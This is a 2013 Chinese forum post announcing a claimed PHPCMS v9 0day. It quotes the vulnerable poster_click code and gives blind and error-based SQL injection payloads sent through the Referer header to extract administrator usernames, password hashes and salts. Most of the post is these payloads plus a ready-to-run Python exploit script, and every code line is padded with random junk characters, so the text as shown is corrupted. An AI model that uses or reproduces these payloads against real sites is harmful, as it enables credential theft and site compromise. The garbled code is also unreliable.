有人放出了phpcmsv9的0day,就随时写了个利用代码,其中注入代码有两种形式:) Y J7 ]; c/ S& l+ P+ D- k
2 ]$ \7 |, X m
问题函数\phpcms\modules\poster\index.php
& R! U0 r0 u# r3 Y* O2 c1 U8 L: f+ f6 H9 n6 p2 U) C; s* q
public function poster_click() {
( ]8 O$ p6 ^4 |' C; o" k$id = isset($_GET['id']) ? intval($_GET['id']) : 0;/ Y4 O* G5 R. h; |: e$ A
$r = $this->db->get_one(array('id'=>$id));
. Y6 h: _# A8 Gif (!is_array($r) && empty($r)) return false;
. p! E" H; a6 k+ }8 G; X$ip_area = pc_base::load_sys_class('ip_area');
' @3 B) I: ^$ a# g# A3 N, i$ip = ip();* a" E9 X* _: D1 H
$area = $ip_area->get($ip); A+ _; W3 z3 o$ H
$username = param::get_cookie('username') ? param::get_cookie('username') : '';+ Z6 q% e& Q; a4 l; J' D
if($id) {
7 S! w; N) O7 F) J. O: e: Y0 w$siteid = isset($_GET['siteid']) ? intval($_GET['siteid']) : get_siteid(); j6 O8 E) B6 L: k
$this->s_db->insert(array('siteid'=>$siteid, 'pid'=>$id, 'username'=>$username, 'area'=>$area, 'ip'=>$ip, 'referer'=>HTTP_REFERER, 'clicktime'=>SYS_TIME, 'type'=> 1));
0 X% k3 Y) ~, ?7 A, ^/ `' H2 h0 T A8 U}9 p) `* w2 s) |0 g) G6 N; I4 z
$this->db->update(array('clicks'=>'+=1'), array('id'=>$id));
+ Y* y# C, P2 m4 b% G$setting = string2array($r['setting']);
' D* \4 `: H& {0 v, g" ^5 P8 Lif (count($setting)==1) {
, Y3 ?- }2 K2 V" Z$ |4 M% V3 _8 T$url = $setting['1']['linkurl'];
" Q2 q) Q: W4 L7 B+ w} else {
, d- I& h) X, m7 Y$url = isset($_GET['url']) ? $_GET['url'] : $setting['1']['linkurl'];9 h' T7 G9 f$ }* S, w! O& ?/ K
} |& F- L) v$ B& K; z' z7 P
header('Location: '.$url);
% q/ y" l6 a) c}$ I# a. o% F9 m/ ^- X: O
. e, d& w- `# c y 2 K4 g: B8 |: G8 D r: Z+ W
) P8 i/ J2 [3 C+ f利用方式:- w! C5 y. j8 G0 H- B& x
9 F' }/ z4 b5 I. d/ n1、可以采用盲注入的手法:
! c3 l& N; _0 T C1 ~5 d$ _" M4 _5 w/ ~" X7 f- r; w+ ^
referer:1′,(select password from v9_admin where userid=1 substr(password,4)=’xxoo’),’1′)#
' D0 s7 N7 h' }' Q9 K
9 K; c3 p: O# |1 N通过返回页面,正常与否一个个猜解密码字段。
c' O' M3 A c: F0 f& \& }% `5 V$ b
2、代码是花开写的,随手附上了:
3 D" E7 |+ d# d$ f7 u. R- J' t+ K) B
1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#1 d, J/ f% v% F4 H& Q' A: r; b3 \
9 R& E6 h5 o3 m9 F5 {2 P* H# @此方法是爆错注入手法,原理自查。# W" c" t% X" p' c
2 `9 V2 F; ~4 x9 c% |0 L; F$ ^
3 E! _9 M% P% @- ~" F0 T$ ]( N9 B/ S$ ~. l: ~, G2 `
利用程序:
% \# O* S' P: T, R9 @8 e
; a! `; K' m& `( F( s% C#!/usr/bin/env python9 Q0 _( P8 R/ o" b; E
import httplib,sys,re+ n: }/ E; W! w
0 T: [+ F/ `$ p5 I6 i0 x# ^
def attack():$ j# l+ |1 v9 v& ~) N& o
print “Code by Pax.Mac Team conqu3r!”9 `& E7 g( V6 E# i# A$ L4 b
print “Welcome to our zone!!!”. B# I6 G! c. @3 D/ v
url=sys.argv[1]
1 P ~! J* b5 T$ e9 {$ Wpaths=sys.argv[2]
) T5 `6 H0 h% Z8 K9 L/ yconn = httplib.HTTPConnection(url)
& w# R" j" ^6 C0 W5 ji_headers = {“User-Agent”: “Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1) Gecko/20090624 Firefox/3.5″,
! `* x. d, }# c4 N" M' a“Accept”: “text/plain”,
/ v, D$ N5 i* [; H/ k1 K“Referer”: “1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#”}
6 u9 a Q: I' }2 mconn.request(“GET”, paths+”/index.php?m=poster&c=index&a=poster_click&sitespaceid=1&id=2″, headers = i_headers)
( B/ B0 g3 r2 Z: Er1 = conn.getresponse()( ?$ L" m+ l" T6 p( ]: u( z' J4 I
datas=r1.read()$ [7 { d: @& q0 J
datas=re.findall(r”Duplicate entry \’\w+’”, datas)$ g; Y9 O: F' k/ p o S8 c8 o% N* r
print datas[0]3 H" W8 m# Z0 p, @
conn.close()
6 q4 `4 t* u! Uif __name__==”__main__”:$ J; l6 w) X! g+ j
if len(sys.argv)<3:
5 e: @" f7 ~4 P6 o' G+ G8 qprint “Code by Pax.Mac Team conqu3r”5 ^* y+ X! G+ T3 r8 {& j
print “Usgae:”
4 e E' ^: }$ A* pprint “ phpcmsattack.py www.paxmac.org /”
. r+ T% i7 l3 g% h6 ^& b) |( @# @print “ phpcmsataack.py www.paxmac.org /phpcmsv9/”" `/ I; Z" g# e) {
sys.exit(1)5 d3 N5 n$ G1 h' d j
attack()
9 q6 i& }1 S8 S! J% V! @0 U
* f5 d+ A$ x. A' C- b7 t. E |
发表于 2013-1-11 21:01:00
收藏
支持
反对